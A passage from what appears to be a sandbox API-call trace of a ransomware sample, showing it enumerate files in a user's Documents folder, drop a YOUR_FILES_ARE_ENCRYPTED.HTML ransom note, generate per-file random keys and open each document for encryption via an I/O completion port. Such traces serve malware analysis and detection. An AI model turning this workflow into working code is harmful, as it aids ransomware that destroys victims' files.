lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" [0166.768] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe019f7d0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0x5e55a470, ftLastAccessTime.dwHighDateTime=0x1d7e13b, ftLastWriteTime.dwLowDateTime=0x5e55a470, ftLastWriteTime.dwHighDateTime=0x1d7e13b, nFileSizeHigh=0x0, nFileSizeLow=0x170e7, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="T95w62znp uj L6ih.pdf", cAlternateFileName="T95W62~1.PDF")) returned 0 [0166.778] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0166.778] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0166.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0166.779] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0166.780] CloseHandle (hObject=0x5b0) returned 1 [0166.781] GetProcessHeap () returned 0x270000 [0166.782] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0166.782] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4aef40, ftCreationTime.dwHighDateTime=0x1d7e273, ftLastAccessTime.dwLowDateTime=0x19e6c680, ftLastAccessTime.dwHighDateTime=0x1d7e2ed, ftLastWriteTime.dwLowDateTime=0x19e6c680, ftLastWriteTime.dwHighDateTime=0x1d7e2ed, nFileSizeHigh=0x0, nFileSizeLow=0x8f14, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="l2acllWy_sU3eMTRQEp.xlsx", cAlternateFileName="L2ACLL~1.XLS")) returned 1 [0166.782] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx") returned 69 [0166.782] lstrcmpW (lpString1="l2acllWy_sU3eMTRQEp.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.782] PathFindExtensionW (pszPath="l2acllWy_sU3eMTRQEp.xlsx") returned=".xlsx" [0166.782] lstrlenW (lpString=".xlsx") returned 5 [0166.782] PathFindExtensionW (pszPath="l2acllWy_sU3eMTRQEp.xlsx") returned=".xlsx" [0166.782] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\l2acllwy_su3emtrqep.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.783] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=36628) returned 1 [0166.783] GetProcessHeap () returned 0x270000 [0166.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.784] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AB") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="52") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EB") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3F") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="C1") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A2") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="29") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="08") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="39") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B1") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D9") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F2") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E6") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="45") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B7") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="92") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1C") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="D6") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="AA") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="80") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="38") returned 2 [0166.785] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" [0166.785] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.785] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.787] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb73b2bf0, ftCreationTime.dwHighDateTime=0x1d7da56, ftLastAccessTime.dwLowDateTime=0xc4dd23a0, ftLastAccessTime.dwHighDateTime=0x1d7e6f2, ftLastWriteTime.dwLowDateTime=0xc4dd23a0, ftLastWriteTime.dwHighDateTime=0x1d7e6f2, nFileSizeHigh=0x0, nFileSizeLow=0xe7a2, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="Ll53vn KF.rtf", cAlternateFileName="LL53VN~1.RTF")) returned 1 [0166.787] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf") returned 58 [0166.787] lstrcmpW (lpString1="Ll53vn KF.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.787] PathFindExtensionW (pszPath="Ll53vn KF.rtf") returned=".rtf" [0166.787] lstrlenW (lpString=".rtf") returned 4 [0166.787] PathFindExtensionW (pszPath="Ll53vn KF.rtf") returned=".rtf" [0166.787] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\ll53vn kf.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.792] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=59298) returned 1 [0166.796] GetProcessHeap () returned 0x270000 [0166.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.797] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E2") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2A") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="0E") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="85") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F6") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9D") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E7") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="71") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="7C") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D4") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="6D") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="0A") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9E") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="91") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="37") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="68") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C8") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="10") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="24") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="08") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4E") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="9F") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="44") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3C") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C7") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="04") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="0C") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="52") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A2") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4A") returned 2 [0166.800] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" [0166.800] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.800] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.812] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b05a5f0, ftCreationTime.dwHighDateTime=0x1d7dc6f, ftLastAccessTime.dwLowDateTime=0x5dc13ae0, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x5dc13ae0, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0xc387, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="MGINEBCK3IRXog.odt", cAlternateFileName="MGINEB~1.ODT")) returned 1 [0166.812] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt") returned 63 [0166.812] lstrcmpW (lpString1="MGINEBCK3IRXog.odt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.812] PathFindExtensionW (pszPath="MGINEBCK3IRXog.odt") returned=".odt" [0166.812] lstrlenW (lpString=".odt") returned 4 [0166.812] PathFindExtensionW (pszPath="MGINEBCK3IRXog.odt") returned=".odt" [0166.812] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\mginebck3irxog.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.813] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=50055) returned 1 [0166.813] GetProcessHeap () returned 0x270000 [0166.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.814] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="08") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E3") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="6F") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EE") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="F6") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C8") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F3") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F5") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DE") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="89") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9B") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="87") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CE") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8B") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="88") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="74") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EC") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E2") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9E") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="61") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="D7") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="2B") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C7") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1D") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E2") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="56") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="57") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D6") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2E") returned 2 [0166.815] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" [0166.815] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.815] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.823] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76bf98c0, ftCreationTime.dwHighDateTime=0x1d7e05c, ftLastAccessTime.dwLowDateTime=0xb7e045c0, ftLastAccessTime.dwHighDateTime=0x1d7e1ce, ftLastWriteTime.dwLowDateTime=0xb7e045c0, ftLastWriteTime.dwHighDateTime=0x1d7e1ce, nFileSizeHigh=0x0, nFileSizeLow=0x1868, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="sOHIcmDO58yppCBHY4.ods", cAlternateFileName="SOHICM~1.ODS")) returned 1 [0166.839] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods") returned 67 [0166.839] lstrcmpW (lpString1="sOHIcmDO58yppCBHY4.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.839] PathFindExtensionW (pszPath="sOHIcmDO58yppCBHY4.ods") returned=".ods" [0166.839] lstrlenW (lpString=".ods") returned 4 [0166.840] PathFindExtensionW (pszPath="sOHIcmDO58yppCBHY4.ods") returned=".ods" [0166.840] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\sohicmdo58yppcbhy4.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.842] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6248) returned 1 [0166.842] GetProcessHeap () returned 0x270000 [0166.842] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.843] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FF") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D3") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="9B") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D0") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="55") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="22") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="10") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="09") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AE") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D2") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8A") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B5") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="37") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3C") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5C") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="F6") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="29") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AD") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F0") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="06") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3B") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E2") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="ED") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="83") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CD") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="BF") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="4E") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A5") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="03") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="61") returned 2 [0166.845] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" [0166.845] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.845] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.855] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb68548c0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0xea371f30, ftLastAccessTime.dwHighDateTime=0x1d7e160, ftLastWriteTime.dwLowDateTime=0xea371f30, ftLastWriteTime.dwHighDateTime=0x1d7e160, nFileSizeHigh=0x0, nFileSizeLow=0x85f3, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="zQmD5wp.ppt", cAlternateFileName="")) returned 1 [0166.855] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt") returned 56 [0166.855] lstrcmpW (lpString1="zQmD5wp.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.855] PathFindExtensionW (pszPath="zQmD5wp.ppt") returned=".ppt" [0166.855] lstrlenW (lpString=".ppt") returned 4 [0166.855] PathFindExtensionW (pszPath="zQmD5wp.ppt") returned=".ppt" [0166.855] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\zqmd5wp.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.856] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=34291) returned 1 [0166.856] GetProcessHeap () returned 0x270000 [0166.856] RtlAllocateHeap 